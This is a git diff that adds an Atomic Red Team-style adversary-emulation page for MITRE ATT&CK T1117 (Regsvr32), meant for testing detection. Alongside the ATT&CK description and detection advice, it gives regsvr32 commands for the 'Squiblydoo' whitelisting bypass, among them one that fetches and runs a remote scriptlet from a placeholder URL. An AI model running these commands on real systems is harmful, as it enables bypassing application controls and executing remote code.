new file mode 100644
index 00000000..a2c98d78
--- /dev/null
+++ b/atomics/t1117/t1117.md
@@ -0,0 +1,90 @@
+# T1117 - Regsvr32
+## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1117)
+<blockquote>Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe can be used to execute arbitrary binaries. (Citation: Microsoft Regsvr32)
+
+Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of whitelists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe is also a Microsoft signed binary.
+
+Regsvr32.exe can also be used to specifically bypass process whitelisting using functionality to load COM scriptlets to execute DLLs under user permissions. Since regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: SubTee Regsvr32 Whitelisting Bypass) This variation of the technique is often referred to as a "Squiblydoo" attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)
+
+Regsvr32.exe can also be leveraged to register a COM Object used to establish Persistence via Component Object Model Hijacking. (Citation: Carbon Black Squiblydoo Apr 2016)
+
+Detection: Use process monitoring to monitor the execution and arguments of regsvr32.exe. Compare recent invocations of regsvr32.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Command arguments used before and after the regsvr32.exe invocation may also be useful in determining the origin and purpose of the script or DLL being loaded. (Citation: Carbon Black Squiblydoo Apr 2016)
+
+Platforms: Windows
+
+Data Sources: Loaded DLLs, Process monitoring, Process command-line parameters, Windows Registry
+
+Defense Bypassed: Process whitelisting, Anti-virus
+
+Permissions Required: User, Administrator
+
+Remote Support: No
+
+Contributors: Casey Smith</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Regsvr32 local COM scriptlet execution](#atomic-test-1---regsvr32-local-com-scriptlet-execution)
+
+- [Atomic Test #2 - Regsvr32 remote COM scriptlet execution](#atomic-test-2---regsvr32-remote-com-scriptlet-execution)
+
+- [Atomic Test #3 - Regsvr32 local DLL execution](#atomic-test-3---regsvr32-local-dll-execution)
+
+
+<br/>
+
+## Atomic Test #1 - Regsvr32 local COM scriptlet execution
+Regsvr32.exe is a command-line program used to register and unregister OLE controls
+
+**Supported Platforms:** windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|-------------------------------------------|
+    | filename | Name of the local file, include path. | Path | Regsvr32.sct|
+
+#### Run it with `command_prompt`!
+```
+regsvr32.exe /s /u /i:#{filename} scrobj.dll
+
+```
+<br/>
+<br/>
+
+## Atomic Test #2 - Regsvr32 remote COM scriptlet execution
+Regsvr32.exe is a command-line program used to register and unregister OLE controls
+
+**Supported Platforms:** windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|-------------------------------------------|
+    | url | URL to hosted sct file | Url | http://www.example.com/file.sct|
+
+#### Run it with `command_prompt`!
+```
+regsvr32.exe /s /u /i:#{url} scrobj.dll
+
+```
+<br/>
+<br/>
+
+## Atomic Test #3 - Regsvr32 local DLL execution
+Regsvr32.exe is a command-line program used to register and unregister OLE controls
+
+**Supported Platforms:** windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|-------------------------------------------|
+    | dll_name | Name of DLL to Execute, DLL Should export DllRegisterServer | Path | payload.dll|
+
+#### Run it with `command_prompt`!
+```
+regsvr32.exe {dll_name}
+
+```
+<br/>
diff --git a/atomics/t1123/t1123.md b/atomics/t1123/t1123.md
index 40228136..0463f1d0 100644
--- a/atomics/t1123/t1123.md
+++ b/atomics/t1123/t1123.md
@@ -52,6 +52,5 @@ SoundRecorder /FILE #{output_file} /DURATION #{duration_hms}
 #### Run it with `command_prompt`!
 ```
 powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet
-
 ```
 <br/>